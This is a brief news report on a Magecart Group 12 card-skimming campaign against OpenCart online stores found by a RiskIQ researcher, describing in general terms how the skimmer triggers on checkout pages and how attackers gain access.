Researcher Yonathan Klijnsma, of the cybersecurity firm RiskIQ, has discovered a large-scale operation perpetrated by Magecart Group 12 against OpenCart's online store management system.
The way of acting consisted in the initial execution of a script that looked for the word checkout in the URL, which the user visited, to verify that the purchase was already being finalized. It then injected the code from the skimmer and, in this way, obtained the credentials from the credit card.
Klijnsma points out that the main cause of these attacks is based on the fact that developers often prioritize the functionality of web platforms. The intrusion, according to Grupo-IB, is materialized by three methods: exploitation of unchecked vulnerabilities, accessing the credentials of the administration panel by phishing or brute force attacks, or compromising an external resource that is loaded into the online store.